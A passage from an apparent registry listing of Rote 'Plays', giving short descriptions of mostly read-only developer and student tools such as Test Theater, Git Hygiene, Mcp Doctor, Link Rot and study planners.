three committers were a CI bot, the author, and another bot. This play drops lockfiles and generated paths so dependency bumps stop impersonating expertise, then ranks people by how much of THIS change they touched, not their commits anywhere. Bots are excluded, and name-heuristic drops are listed so a misjudged human stays visible. Cold expertise is flagged with its age, single-owner files as bus-factor risk, and requested reviewers are compared against what they touched — never called wrong. It reads commit authorship only, cannot follow renames, and says so. Read-only, no API key beyond gh.ROTE5 STEPSREAD ONLY14 ↓69Geo ReadyAudits whether ChatGPT, Claude, Perplexity and Gemini can crawl, read and cite a website. Scores it out of 100 from robots.txt, llms.txt, structured data and server-rendered content, then writes an HTML report and a paste-ready fix prompt for your coding agent.ROTE13 STEPSREAD ONLY14 ↓70Test TheaterFinds Python tests that cannot fail, without running them. CANNOT_FAIL marks tests whose assertions are all on literals, or are swallowed by a bare except. NO_VALUE_CHECK marks tests with no assertion anywhere. WEAK marks permanently-skipped and duplicate bodies. Everything else is EXAMINED: read, with no pattern matched, which is never a claim the test is good. NOT_ANALYZED is kept for a test that delegates its assertions to a same-file helper: the helper is known to assert, which is why the test is not flagged, but whether it checks a real value was never judged, so the test is neither cleared nor flagged. It is reported separately so a judged-clean suite and an unjudged one cannot look alike. Reads pytest assert, unittest self.assert*, async tests, and assertions delegated to same-file helpers. Every finding carries the commit and age of the line that introduced it; pass base_ref=origin/main for a per-pull-request gate listing only what your branch added. Names any path it could not read, and shows no findings at all when a step was blocked or truncated rather than passing a partial run off as a clean one. Pass target=demo to audit the bundled suite with no repository and no setup. Never imports or executes the suite: only ast.parse touches it. Zero credentials, python3 and git.ROTE2 STEPSREAD ONLY14 ↓71Femme Cadence WatcherAn air-gapped, privacy-first biological telemetry sentinel. Orchestrated via Modiqo Rote, this play maps reference cycle dates into deterministic hormonal cadence phases to deliver personalized cognitive focus, physical output thresholds, and nutritional priorities directly to your Telegram chat. All biological state modeling executes locally on your machine—ensuring zero third-party cloud data persistence, zero tracking, and complete credential isolation. ROTE1 STEPSREAD ONLY12 ↓72Web Game Build ReadinessChecks whether a web game build will run on someone else's machine, before you upload it. Five probe families run as parallel DAG steps (entry point, static asset references, machine-local references, engine companion files, build weight), any incomplete filesystem walk or read becomes INCOMPLETE, and the join reports blockers, risks, exact scan coverage and what it deliberately did not check. The asset probe resolves the static URL forms it recognizes in HTML, JS and CSS, including base href and srcset, URL-decodes paths, rejects references that escape the uploaded directory, and detects case-colliding files rather than choosing one by walk order. Read-only: never writes into the build, never launches it, carries no credentials, needs only python3.ROTE7 STEPSREAD ONLY11 ↓73Test Gap MapperBefore a change is reviewed or merged, it is easy to mistake a nearby test filename for evidence that the changed behavior is covered. Test Gap Mapper turns one local Git range into a conservative, inspectable test-impact brief. It inventories changed source paths, correlates them with tracked test paths using stable filename and directory tokens, isolates changed schema/database and dependency-manifest areas, and makes the difference between evidence and a heuristic explicit. It is useful for planning a focused review, not for certifying coverage: dynamic imports, generated tests, external test systems, behavior-level assertions, and ignored files remain UNKNOWN. Every recommendation is a non-mutating next check. Read-only: it uses local Git metadata and tracked filenames only; it never runs tests, installs packages, edits files, fetches, pushes, or contacts a remote.ROTE4 STEPSREAD ONLY11 ↓74Works On My Machine InvestigatorFind the hidden assumptions behind the most infamous sentence in software engineering: works on my machine. This is an offline, static portability audit for a local repository. It checks whether the runtime a developer probably has locally disagrees with package metadata, Docker, or bounded CI workflows; whether lockfiles and package-manager declarations conflict; whether source-required environment-variable names have a value-free example and visible CI contract; whether scripts rely on ambiguous Python, POSIX-only shell commands, or undeclared global executables; whether relative imports can fail on a case-sensitive filesystem; and whether README setup refers to ignored local-only files with no example contract. It ranks likely first failures, separates high-confidence evidence from unprovable runtime assumptions, explains why the machine may have masked each issue, and returns a safe reproduction order without executing it. report=all emits a value-free portability contract matrix and coverage record. It never executes project code, reads environment values, follows symlinks, changes files, fetches, or contacts services.ROTE4 STEPSREAD ONLY11 ↓75Git HygieneThe cleanup nobody wants by hand. Audits a git repo for stale branches, unpushed work, dirty worktrees, merged-but-not-pruned branches — one sweep with a safe prune mode behind the apply=true gate. Read-only by default; writes only on explicit opt-in. ROTE5 STEPSREAD ONLY11 ↓76Quiet CheckFind the places a Play goes quiet when something fails, so a failure never reads as a clean result. A check that returns nothing looks exactly like a check that found nothing, and that is how a broken step ships. This reads a Play package and reports six shapes that hide a failure. A guard that tests a tool is present and then runs it with flags another implementation rejects, so the fallback never fires. A shell body that needs bash 4 under the bash 3.2 macOS has shipped since 2007, where an associative array is the one that does not announce itself, because the option is rejected, every key subscripts to 0, and the last write wins. Stderr discarded inside a substitution with no fallback, so an error arrives as an empty string. A traversal that can partially fail without saying so. A broad except that only passes. And a guarded block with no else, which emits nothing when the tool is absent. It never imports, executes or pulls what it reads, it writes nothing, and it runs no subprocess at all. It names what it could not read, and it says so when nothing matched. It runs its own positive and negative cases before the scan and refuses to call the scan trustworthy if any of them fail.ROTE3 STEPSREAD ONLY11 ↓77Hackathon Portfolio TriageRanks every hackathon entry you have open by which one will cost you an entry first. It validates a bounded manifest, then one triage step audits up to sixteen repositories through an eight-worker pool before joining deadline pressure against unresolved findings. This is intentionally a sequential Rote DAG because repository fan-out lives inside that bounded process, not in fabricated per-repository DAG nodes. A clean entry never outranks a broken or incomplete one however close its deadline. Impossible dates, relative paths, duplicate names, malformed audit output, and partial scans fail closed. Read-only: never writes to an audited repo, never runs its build, carries no credentials, needs only python3 and git.ROTE2 STEPSREAD ONLY10 ↓78Environment Drift DetectiveCatch repository configuration contradictions before they become fresh-clone, CI, or deployment failures. This is a static contract audit, not a deployment test: it cross-checks environment-variable names and parsing types across bounded application source, .env.example/.env.sample, Dockerfile, Compose, README, package metadata, and every bounded GitHub Actions workflow. It also compares Node runtime signals, documented/Compose ports, source and CI-only configuration names, and source parsing inconsistencies. Every finding states its severity, the evidence boundary, the two sources that disagree where available, and a concrete remediation order. report=all additionally emits a value-free coverage and contract matrix so absence findings can be reviewed. It never reads environment values, executes project code, changes files, follows symlinks, contacts services, or treats runtime-injected settings as proven absent.ROTE4 STEPSREAD ONLY10 ↓79Incident Time MachineReconstruct the local Git evidence around an incident without inventing a deployment narrative. Given an incident timestamp, this Play builds a bounded before/after commit timeline, groups changed paths, marks candidate configuration/dependency/test areas, and ranks the nearest changes as investigation leads—not causes. You control the evidence window, maximum commits, and whether compact changed-path summaries are included. The report distinguishes observed Git facts from competing explanations that need telemetry, CI, deploy, dependency, or runtime evidence. Read-only: it never contacts remotes, fetches, changes Git state, runs code, or reads secrets.ROTE5 STEPSREAD ONLY10 ↓80Clients FinderSearch freelance platforms (Upwork, LinkedIn, Freelancer, PeoplePerHour, YT Jobs, Workana, job boards) to find clients hiring editors for a given niche, verify the job links are live, extract contact emails, and produce a formatted Excel (.xlsx) lead listAPISESSIONSEXA-SEARCH11 STEPSREAD ONLY10 ↓81Link RotRequests every external URL a repository's documentation hands a reader and reports which no longer resolve, and resolves every relative link and in-page anchor against the tracked file list with no network at all. 7 probes read tracked docs and project manifests such as package.json homepage, pyproject [project.urls] and FUNDING.yml, then contact each URL with HEAD and fall back to GET, following redirects and recording the chain. It flags dead status codes, pages that redirect to the site root so the linked content is gone while the link still answers 200, and permanent moves the documentation should name instead. Offline it still reports a relative link or image pointing at a path git does not track, a path that differs from a tracked one only in case so it 404s on GitHub and Linux CI while working on a Mac, a file that exists only untracked, and an anchor no heading slugs to. Placeholder hosts, template URLs carrying a {slot}, and rate-limited 429 responses are never reported as dead. It does not verify that a page contains what the link text promises, and it reports UNKNOWN rather than a pass when nothing could be checked.ROTE7 STEPSREAD ONLY10 ↓82Agent Resource AuditReports every agent-related process running on THIS machine right now -- Claude Code, Codex, Cursor and Windsurf helpers, Copilot, Aider, opencode, gemini-cli, MCP servers, codex-companion, and rote play or proc child processes -- grouped into harness-cli, desktop-app, mcp-server, companion, known-daemon, or helper, each with its resident memory, CPU percent, and age, ranked by memory alongside the total agent memory footprint against total system RAM. Two roots enumerate the process table and read total RAM in parallel, then one join step classifies and ranks. A process is only ever labeled orphan-suspect under a conservative rule -- reparented to launchd (ppid 1), agent-shaped (harness-cli, mcp-server, or companion), and running more than ten minutes -- never a certainty, and known daemons and desktop-app helpers are excluded from that label outright. The only signals collected are pid, ppid, resident memory, CPU percent, elapsed time, and the first 200 characters of the command line, plus (for the sessions join below) a Claude Code session id when one is disclosed in the process own argv -- never environment variables, never file contents. Nothing is ever killed or signaled: an orphan-suspect prints its kill command as text under an explicit note that nothing was executed, for you to read and run yourself. A third root step lists agent SESSION files on disk across harnesses -- Claude Code and Codex to start -- one row per session with harness, session id, started time, and last-interaction time, joined against the same process table by the session id a running Claude Code process discloses in its own argv, in either of two verified shapes (--session-id <uuid>, or --resume=<uuid> for the VS Code extension in-place-resume shape), to classify each as running-active, running-idle, or resumable (no matching process), with pid, resident memory, and CPU percent attached for the running ones, a totals line summarizing how many are running versus resumable and how much memory they hold, and idle_minutes / max_age_days / harness parameters. Codex sessions cannot be joined to a process the same way -- its own process arguments carry no equivalent session id -- so every codex session is reported honestly as resumable, with a separate note only when a codex process is detected running at all. Session files are listed by stat metadata only (name, birth and modified timestamps) -- their contents are never opened, the same trust line as every other step here. Advisories for idle or resumable sessions -- an exit-and-resume suggestion, or the resume command itself -- are printed as text only, exactly like the orphan-suspect kill hints above: nothing here is ever executed on your behalf. Read-only, no credentials, no network; needs only python3.ROTE4 STEPSREAD ONLY10 ↓83Git Change Review PlannerLarge diffs are reviewed more reliably when the reviewer starts with an evidence-backed map instead of a flat list of files. Git Change Review Planner validates one local base revision, compares it with HEAD, groups changed paths into practical review areas, and returns targeted questions and verification leads for code, tests, configuration, dependencies, and documentation. It reports invalid revisions as UNKNOWN rather than silently comparing the wrong history. The result is a planning brief, not an approval: runtime behavior, generated artifacts, remote divergence, external consumers, and uncommitted intent are outside its local Git evidence. Read-only: it never changes a repository, branch, index, stash, remote, or working tree; it never fetches, pushes, checks out, or contacts a service.ROTE5 STEPSREAD ONLY9 ↓84New Developer Repo NavigatorTurn unfamiliar repository archaeology into a bounded, evidence-backed starting guide. It identifies stack and manifest signals, likely entrypoints, directories, database/auth/test/documentation clues, declared setup and test commands, environment-contract names, and a deliberate first-reading order. You control whether documentation and test signals are included and whether report=all adds a value-free evidence inventory. It never runs setup commands, installs dependencies, reads secret values, changes files, or contacts services; unproven architecture and runtime behavior remain UNKNOWN.ROTE5 STEPSREAD ONLY9 ↓85Play PreflightWe preflighted all 161 public Plays in the registry. Every one returns a contract rote marks not fully resolved, and every one reports write_permissions as an empty list. An empty list reads like a guarantee. It only means nobody asked. Preflight tells you what a Play will carry, require and attempt before you grant it process access. It reads rote's own contract via play inspect --json, rehearses the run with rote's non-executing resolver via play run --dry-run, and scans the package itself for captured secrets, hardcoded author paths, and symlinks that escape it. It never executes the target Play, and it does not reimplement rote's contract logic. It asks rote. Run it with no arguments to watch it catch a bundled compromised sample, then point it at anything you are about to trust. Full registry findings ship in the package as REPORT.md. Effect disclosure: rote owns its own installation, workspace and backup behaviour, and running any Play may create rote run workspaces, logs and artifacts. With fetch=true this Play additionally asks rote to download a package, which may create package, lock and backup entries under ~/.rote/flows. It passes --no-deps, so no dependency is installed. With fetch=false Preflight does not invoke rote registry play pull at all. Rote has no frontmatter field for a filesystem effect, so none of this can appear in write_permissions, which records adapter mutations only.ROTE1 STEPSREAD ONLY9 ↓86Repo Fire CheckOne screen. Zero credentials. Is anything on fire in my repos today? A deterministic local-git fire alarm for up to 20 clones: unpushed commits, dirty worktrees, unresolved conflicts, CI and review state, lockfile rot, stale branches. Fixed seven-row checklist, one health score, day-over-day delta and streak. Day one already has yesterday in it: with no saved history the play reconstructs yesterday's card from git itself (commit dates, branch ages, lockfile mtimes), so the very first run reports real movement instead of an empty baseline, and names the rows it could not reconstruct. Finds your clones automatically -- no ~/src convention required -- and a scan that reached zero repositories reports UNKNOWN, never a perfect score. No LLM anywhere: identical repo state produces an identical card. Reads your repositories with plain git (strictly read-only); the optional gh CLI upgrades CI and review rows and degrades silently to a cached snapshot without it. Writes only its own state, listed by path, mode and reason in the play source (write_permissions): one append-only history line (~/.rote/fire-check/history.jsonl) and a CI snapshot cache; pass record_history=false for a fully read-only run. macOS and Linux only (Windows unsupported). Requires git and python3; gh optional. Pass demo=true to run bundled deterministic fixtures with a [DEMO] badge.ROTE8 STEPSREAD ONLY9 ↓87Agent Instruction Collision MapYour AI agent has too many bosses. Scans AGENTS.md, Cursor rules, CLAUDE.md, and Copilot instructions for conflicts, duplicates, and orphans before any agent work begins. Read-only with path-line evidence.ROTE1 STEPSREAD ONLY9 ↓88Pre Submission GateOne decision and one ordered fix queue for a repository you are about to submit, joined from four independent audits rather than four reports to reconcile by hand at 2am. Credentials reachable from git history, whether the project location breaks its own build, how the repository reads to a judge opening it cold, and whether a web build inside it loads anywhere else all run as parallel DAG steps. The gate requires exactly one structurally valid answer for every dimension and refuses SHIP on an unknown verdict, incomplete scan, malformed finding, duplicate result or missing result. A repository with no web build reports that dimension NOT APPLICABLE, which is distinct from unanswered. The repository audits are read-only and do not execute project code. The history audit may make an authenticated read-only GitHub metadata request through the caller's existing gh session to report repository visibility; failure to resolve it is reported, not treated as clean.ROTE6 STEPSREAD ONLY8 ↓89Ci Failure InvestigatorA long CI log often mixes the line that actually failed with warnings, retry noise, and downstream cascade errors. CI Failure Investigator converts one authorized local failed-job log into an inspectable investigation brief: it identifies a recognizable stage when present, classifies formatting/lint, TypeScript, and test evidence conservatively, extracts file-and-line annotations, separates non-causal warnings, and gives a safe verification sequence without running it. It deliberately does not invent repository context, changed files, runner state, the exact CI command, or a guaranteed fix when the supplied log lacks that evidence. Credential-shaped assignments are redacted before analysis and input is bounded to 1 MB. Read-only: it only reads the supplied local log; it never contacts CI, opens a repository, executes project code, installs packages, or changes files.ROTE4 STEPSREAD ONLY8 ↓90Dataset Eval Sanity CheckCheck a JSONL dataset for duplicate rows, missing required keys, and text length outliers with exact row citations.ROTE1 STEPSREAD ONLY8 ↓91Training Health CheckRun a deterministic training health checker against plain-text and W&B offline logs and compare their verdicts.ROTE3 STEPSREAD ONLY8 ↓92Repository Handoff SnapshotA repository handoff fails when critical knowledge exists only in one maintainer’s head. Repository Handoff Snapshot creates a local, evidence-backed onboarding and continuity brief by checking for visible README, contribution, license, CI, example, build-manifest, and documentation signals. It makes absence explicit, separates presence from quality, and turns gaps into questions a new maintainer can resolve before depending on the project. It does not infer that a present document is accurate, that a CI workflow passes, or that a project is safe to release; those facts remain UNKNOWN without execution or external evidence. Read-only: it never edits files, alters Git, runs project commands, opens credentials, or contacts external services.ROTE7 STEPSREAD ONLY8 ↓93Git Worktree Safety SnapshotBefore switching branches, handing a machine to a teammate, or cleaning a workspace, it helps to know which work exists only locally. Git Worktree Safety Snapshot reads local Git state and reports tracked/untracked modifications, detached-HEAD state, stash presence, upstream configuration, and divergence that can be computed without a fetch. It distinguishes no evidence from a clean state: an unavailable upstream or stale remote reference is not proof a branch is safe. The report is a handoff decision aid, not a backup or synchronization operation. Read-only: no files, branches, stashes, commits, fetches, pushes, network requests, or repository configuration are changed.ROTE5 STEPSREAD ONLY8 ↓94Release Readiness InvestigatorA release decision should distinguish an observable blocker from a check that simply has not been performed. Release Readiness Investigator assembles a local, evidence-bounded release brief from working-tree state, a selected Git range, declared CI and test signals, release documentation, dependency/manifests, migrations, and changed modules lacking obvious nearby tests. It returns GO, CAUTION, or BLOCKED as a review posture—not production approval—and pairs each posture with the missing proof and safest next check. The Play does not run tests, query CI, inspect deployment state, install packages, alter Git, or contact external services, so all runtime, environment, and production evidence is explicitly PARTIAL or UNKNOWN.ROTE5 STEPSREAD ONLY8 ↓95Security Sensitive Change ScoutSecurity review is most useful when it points humans toward a changed trust boundary, not when it pretends static text can find every vulnerability. Security Sensitive Change Scout reads one local Git range, classifies changed paths and diff context for authorization, authentication, uploads, secrets-shaped configuration, cryptography, CORS, dependencies, and externally reachable boundaries, and produces evidence-linked questions for a reviewer. Findings mean additional attention is warranted; they are not exploit findings, compliance approval, or proof a path is safe. It never prints secret values, executes project code, calls security scanners or services, changes Git state, or applies a fix. Unseen generated code, runtime routing, deployment policy, and external controls are reported as outside the evidence boundary.ROTE5 STEPSREAD ONLY8 ↓96Bug Reproduction InvestigatorA vague bug report should produce a disciplined first investigation, not invented root causes. Bug Reproduction Investigator tokenizes the report, performs a bounded static scan of local source and test text, ranks evidence-bearing entry points, separates matching test evidence from absent evidence, and turns the supplied symptom into a smallest plausible reproduction outline. It explicitly names the browser, network, environment, state, and runtime facts it cannot observe because it never executes the application. Use it to decide where to start reading and which observation to collect next; do not treat a text match as proof of a defect or reproduction. Read-only: no application/test execution, Git mutation, network call, package installation, or file modification occurs.ROTE5 STEPSREAD ONLY8 ↓97Submission Survival CheckA grader or professor starts from a clean machine, not from the environment that accumulated on a student laptop. Submission Survival Check performs a bounded, read-only preflight of an assignment folder: it compares optional stated requirements with visible entry files, scans dependency declarations versus static imports, flags hard-coded local paths and environment assumptions, checks README run instructions against filenames, and surfaces likely clutter such as caches, outputs, and debug artifacts. The report is a survival checklist, not a grading prediction: hidden rubric rules, runtime behavior, generated files, operating-system behavior, and any file not inspected remain UNKNOWN. It never executes untrusted student code, opens secret values, uploads a submission, deletes clutter, or modifies project files.ROTE4 STEPSREAD ONLY8 ↓98Git Handoff ProofChecks whether the command that passes in your workspace also passes at the exact commit you're about to hand off—on the same machine, in a temporary linked worktree.ROTE5 STEPSREAD ONLY8 ↓99Daily Inbox TriageRead-only inbox triage for Gmail. Classifies a search window from message headers alone into Act now, Act this week and No action, and names every message it could not decide instead of guessing. Urgency is a testable rule, not a vibe: something is urgent only if it states a deadline inside 24 hours or blocks another person. Reads headers only, never message bodies; never writes to your mailbox. Writes one PDF into your working folder each run -- disable with report='. APISESSIONSGMAIL7 STEPSREAD ONLY8 ↓100Mcp DoctorIs each of your configured MCP servers healthy, and what should you do about the ones that are not? mcp-context-tax (already published, ours) MEASURES the token cost of what your servers advertise; mcp-doctor DIAGNOSES health and tells you what to do about each one -- two tools, not one tool twice. Five jobs, in order: discovers MCP server configs across installed harnesses on this machine (the same well-known, harness-owned paths as mcp-context-tax -- Claude Code global and per-project mcpServers, Claude Desktop, Cursor, Codex config.toml mcp_servers tables, Windsurf -- never a filesystem walk for stray project .mcp.json files; an unreadable or unexpectedly-shaped config file degrades only that one source, never the whole scan); starts each configured local stdio server in an isolated process group and a minimal allowlisted environment (PATH plus locale/timezone variables only, never this play's own ambient environment) solely for the standard MCP handshake, then terminates that whole process group -- nothing else on the machine is signaled (remote servers are never contacted at all -- this play makes zero network calls of its own, and it does not enforce that a spawned local server won't reach the network on its own, e.g. a launcher fetching a package); classifies every server into exactly one honest state -- healthy, needs-auth, slow-coldstart, unresponsive, config-error, remote-not-probed, or capped -- measuring COLD-START TIME explicitly (monotonic milliseconds from spawn to the first well-shaped initialize response, a real measurement, never an estimate) so a slow uvx/npx first-run download reads as slow, not as a hang; writes a short text-only ADVISORY for every non-healthy server -- what to check or run by hand, never executed by this play, the same house pattern our own mcp-context-tax established; and detects CONFIG DRIFT across those same discovered rows -- the same server name declared in more than one config scope with a different command or args (scope shadowing, where which one wins depends on the harness's own precedence rules) or with an identical definition (a redundant duplicate declaration). Read-only against your configs: only a has_env boolean and the env var NAMES COUNT survive, never a value; a server's command-line argument VALUES are never displayed, only a structural summary (flag names, length-bucketed placeholders) -- an advisory that shows a command line shows only that redacted structural form, never a real argument value. No credentials transmitted beyond that minimal allowlisted environment; needs only python3.ROTE2 STEPSREAD ONLY8 ↓101Npm Package HealthHealth report for any npm package. Downloads, license, maintainers, CVEs. Grade A-F.ROTE4 STEPSREAD ONLY8 ↓102Log Leak MapEveryone hunts secrets in git history. This hunts log/output sinks. One row per Python/JS logging call — CONFIRMED SINK / SENSITIVE / SUSPICIOUS, DEBUG as a modifier, redacted reconstruction. Read-only, zero adapters, Python stdlib.ROTE1 STEPSREAD ONLY8 ↓103Project Kickoff PageCreates one Notion kickoff page for an explicitly named repository after validating the repository, deadline and optional parent page id. Automatic repository discovery is deliberately disabled: a bounded scan can miss a nested repository or one past the first 200 entries, and choosing the wrong repository before a write is unsafe. Rote performs its automatic Notion authentication preflight before the DAG, which may refresh an expired OAuth token; no page-create call is reachable until validation, parallel inspection and audit, and page composition have completed. It counts tests and CI only when real files exist, strips credentials from remote URLs, resolves chained README tasks and common local entrypoints, scans every tracked file for secret shapes within explicit bounds, and treats skipped, truncated, malformed or incomplete evidence as unknown rather than clean. Exactly one conditional create step routes either to the supplied parent page or to a private workspace-level page. A create call whose response cannot prove whether a page exists omits the boolean `created` result and reports an unconfirmed write so callers do not retry blindly. It never edits, archives or deletes an existing page.APISESSIONSNOTION-MCP6 STEPSWRITES7 ↓104Hn Launch Reality CheckCompares the current score and comment distributions of up to the first 40 ranked items from Show HN, Ask HN, and the front page before a launch. Each category is reduced independently, so one failed category remains NOT READ while successful categories keep their medians, quartiles, sample sizes, and share below a configurable quiet threshold. Deleted, dead, and unavailable item stubs shrink the disclosed sample instead of becoming zero-score posts. The result explicitly describes a live, rank-biased slice—not every listed post, not a historical random sample, and not a forecast for your post. Needs no account, credential, or key. Read-only: it reads public posts and writes or posts nothing.APIHACKER-NEWS-API9 STEPSREAD ONLY7 ↓105Test Command FinderFind a repository's declared test and quality-check entry points before you run anything. It reads common manifests and Makefiles, returns safe command candidates with their source, and redacts obvious secrets. Read-only: it does not execute commands, install dependencies, or modify files.ROTE12 STEPSREAD ONLY7 ↓106Wtf Did Professor SayExtract what was taught, emphasized, assigned, and time-sensitive from messy lecture notes, transcripts, slides, or announcements. Read-only text analysis with explicit UNKNOWN states.ROTE9 STEPSREAD ONLY7 ↓107Viva Survival ModeExplain your own code before the professor asks. Finds complex functions, architecture signals, dependencies, algorithms, magic numbers, and likely viva questions in a local project. Read-only: never executes code or reads secret values.ROTE9 STEPSREAD ONLY7 ↓108Teach Me My Own CodeTeach a project back to its author: map recognizable areas, complex control flow, algorithms, magic values, dependencies, and questions to practice. Read-only and non-executing.ROTE9 STEPSREAD ONLY7 ↓109Exam Panic PlannerTurn syllabus topics and days remaining into a dependency-first exam plan with realistic practice and postponement guidance. Read-only and uncertainty-aware.ROTE9 STEPSREAD ONLY7 ↓110Where Did I StopRemind yourself what you were building after time away. Reads Git state, unfinished markers, and bounded source signals to propose the smallest next action. Read-only: never executes project code or changes Git.ROTE10 STEPSREAD ONLY7 ↓111Github Shame CleanerWould you send this repository to a recruiter? Perform a read-only portfolio audit for setup clarity, debug traces, TODOs, abandoned files, generated clutter, oversized files, commit-message quality, and exposed-secret indicators without revealing values.ROTE7 STEPSREAD ONLY7 ↓112Tutorial Hell DetectorFind signs that a student project accumulated conflicting tutorials: duplicate approaches, routing systems, stale configs, dead experiments, multiple package managers, and outdated README instructions. Read-only: never executes code or reads secrets.ROTE7 STEPSREAD ONLY7 ↓113Stale Documentation DetectorDocumentation becomes dangerous when a plausible-looking command, path, runtime version, or setup step no longer matches repository evidence. Stale Documentation Detector performs a bounded, read-only cross-source audit of README and documentation text against visible manifests, scripts, files, directories, environment examples, and runtime declarations. Each finding names the documentation reference, the local evidence it conflicts with, a confidence level, and a manual verification step; missing evidence is reported as UNKNOWN instead of rewritten into a fact. It never executes instructions, edits documentation, runs project code, reads secret values, or contacts services. Use it to prepare a focused docs-maintenance review, not to automatically change user-facing guidance.ROTE7 STEPSREAD ONLY7 ↓114What Can I SkipWhen time is genuinely limited, a useful study plan should make uncertainty and tradeoffs visible instead of promising a grade. What Can I Skip turns a supplied syllabus, optional past-paper/weighting notes, and available study days into a risk-aware triage: must-understand foundations, high-value next topics, quick wins, work that may be deferred, and explicit conditions under which deferral is unsafe. Its recommendations are derived only from the text you provide; it does not claim access to an instructor’s intentions, a real marking scheme, or future exam questions. Use it to allocate attention and identify what to confirm, not as permission to ignore a topic. Read-only: no external education systems, files, or accounts are accessed or modified.ROTE7 STEPSREAD ONLY7 ↓115Pr Review Me FirstBefore asking another person to review a diff, Pr Review Me First turns the local change since a validated base revision into a reviewer-oriented preflight. It inventories changed paths, flags visible debug leftovers and unfinished markers, highlights configuration/API/dependency risk, detects scope signals that deserve explanation, identifies test-related evidence, and phrases high-value questions a reviewer can answer from the change. It is intentionally not an automated approval or security scan: behavior, code quality, generated content, hidden tests, and production impact cannot be proven from a local diff and are marked as limits rather than guessed. Read-only: it does not run tests, modify Git, write files, fetch, push, or contact a remote.ROTE7 STEPSREAD ONLY7 ↓116Why Is Ci Mad At MeWhy Is CI Mad At Me correlates an authorized local CI failure log with a local repository diff, workflow configuration, runtime/dependency manifests, and statically relevant source paths. It separates direct log/diff evidence from ranked hypotheses, calls out warnings and missing context, and proposes non-mutating checks in the order most likely to reduce uncertainty. It never assumes the checkout matches the CI commit, that a workflow file was used, or that a static match proves the cause; those conditions are named as PARTIAL or UNKNOWN. Read-only: it never runs project code, triggers CI, reads service credentials, alters Git, installs dependencies, or contacts CI services.ROTE7 STEPSREAD ONLY7 ↓117Assignment To ChecklistAssignment instructions frequently hide deliverables, filename rules, formatting constraints, marks, deadlines, and submission traps in long prose. Assignment To Checklist extracts the observable requirements into an actionable checklist, identifies wording that should be confirmed with the instructor rather than guessed, and can compare named deliverables against a local submission folder when one is supplied. It keeps requirement text distinct from folder evidence: a missing filename is a review lead, not proof that a requirement was violated; ambiguous instructions remain ambiguous. It is especially useful as a pre-submission review packet shared with a teammate or TA. Read-only: it does not execute student code, upload work, inspect secret values, edit files, or contact a learning platform.ROTE7 STEPSREAD ONLY7 ↓118Api Breaking Change DetectorA diff can be syntactically small while changing the contract that callers depend on. API Breaking Change Detector compares the before-and-after local Git diff for recognizable route declarations, exported functions, and exported types, then groups possible interface removals, required-parameter changes, and route changes into evidence-backed findings and explicitly labeled heuristics. It gives a compatibility-review plan rather than declaring semantic-version compliance: generated APIs, reflection, runtime routing, documentation contracts, consumers outside the repository, and actual client behavior remain UNKNOWN unless represented in the local diff. Read-only: it never runs tests, starts a service, changes Git state, fetches, pushes, or contacts a remote.ROTE5 STEPSREAD ONLY7 ↓119Claim Vs Reality AuditorPR descriptions and release notes often compress several different claims into one confident sentence. Claim Vs Reality Auditor reads a supplied local Git range and a supplied list of claims, then classifies each claim as VERIFIED, CONTRADICTED, UNPROVEN, or NOT CHECKABLE using only inspectable local diff/path evidence. It preserves the precise evidence boundary: a changed test file is not proof tests passed, an unchanged path is not proof an API was untouched, and runtime, deployment, and external-service claims remain unknown unless represented in the local evidence. Use the report to rewrite claims conservatively and target review; it does not run tests, alter Git state, fetch, push, or contact any service.ROTE5 STEPSREAD ONLY7 ↓120Dependency WhyDependencies survive long after the feature, plugin, build step, or transitive assumption that introduced them has been forgotten. Dependency Why performs a bounded local static investigation across package manifests, imports, configuration, scripts, and text references to explain the strongest observable reason a named dependency appears to exist. Its report distinguishes direct application usage, tooling/configuration evidence, manifest-only evidence, and no obvious static usage; dynamic loading, generated code, lockfile-only transitives, and runtime behavior remain explicitly UNKNOWN. It is a removal-review starting point, not a license/security verdict or permission to delete a package. Read-only: it never installs, removes, upgrades, executes, or contacts a package registry.ROTE5 STEPSREAD ONLY7 ↓121Dev Storage ReclaimerAudits dormant local developer projects and ranks reclaimable dependency and cache space.ROTE3 STEPSREAD ONLY7 ↓122Env Drift AuditorAudits local .env files against templates without exposing secrets.ROTE3 STEPSREAD ONLY7 ↓123Github Stale Pr Calendar ReminderRequires a GITHUB_TOKEN environment variable (read-only access is sufficient) before running. Pull requests open longer than N days on a GitHub repository, with a ready-to-save Google Calendar reminder link listing themAPISESSIONSGITHUB4 STEPSREAD ONLY7 ↓124Mcp Context TaxHow many tokens of your context window do your configured MCP servers consume before you type a word? Five jobs, in order: discovers MCP server configs across installed harnesses on this machine (Claude Code global and per-project mcpServers, Claude Desktop, Cursor, Codex config.toml mcp_servers tables, Windsurf -- only well-known user-level paths, never a filesystem walk for stray project .mcp.json files; an unreadable or unexpectedly-shaped config file degrades only that one source, never the whole scan); sorts each into stdio (local, spawnable) or remote (never contacted -- this play makes zero network calls of its own; it cannot confine a spawned local server that reaches the network on its own, e.g. a launcher fetching a package); starts each configured local stdio server in an isolated process group and a minimal allowlisted environment (PATH plus locale/timezone variables only, never this play's own ambient environment) solely to read its advertised schemas, then terminates that whole process group -- nothing else on the machine is signaled; performs the standard MCP handshake (initialize, notifications/initialized, tools/list, resources/list, prompts/list) against each one inside a bounded per-server timeout, accepting only well-formed JSON-RPC 2.0 replies so a stray log line can't spoof one; and estimates the token cost of what each server advertises from the JSON schema size, chars divided by four, always labeled an ESTIMATE and never a real tokenizer count. Every server lands in exactly one honest bucket: healthy, needs-auth, slow, unresponsive, remote-not-probed, or config-error -- a server that needed credentials this play was never given, or one that refused to spawn at all, is a labeled degrade (a short fixed reason code, never raw child output that could itself echo a credential), never a crash, and a handful of servers legitimately land in each bucket on a real machine. This measures your standing configuration right now, not a recorded trace from some other day -- different from the ideas list, which asks for a token count against a saved transcript. Read-only against your configs: only the advertised tool/resource/prompt schemas and their byte sizes are collected, never environment variable values (only a has_env boolean and the env var NAMES COUNT survive), and a server's command-line argument VALUES are never displayed at all -- only a structural summary (flag names, length-bucketed placeholders); the real values exist only long enough to spawn a server for probing, via a private owner-only-readable file this play never prints. No credentials transmitted beyond that minimal allowlisted environment; needs only python3.ROTE2 STEPSREAD ONLY7 ↓125Password Breach CheckZero-Knowledge Password Security Auditor (v0.1.0): Evaluates breach status (HIBP k-anonymity), zxcvbn entropy & crack times, local credential reuse, deterministic risk scores (0-100), CI/CD scan gates, and remediation plans. Supports key=value, CSV, JSON, or file input formats. Raw passwords are NEVER logged, stored, or transmitted.ROTE1 STEPSREAD ONLY7 ↓126Repo Onboarding BriefRead a repository and emit a six-section onboarding brief (WHAT THIS IS, SETUP, VERIFY, 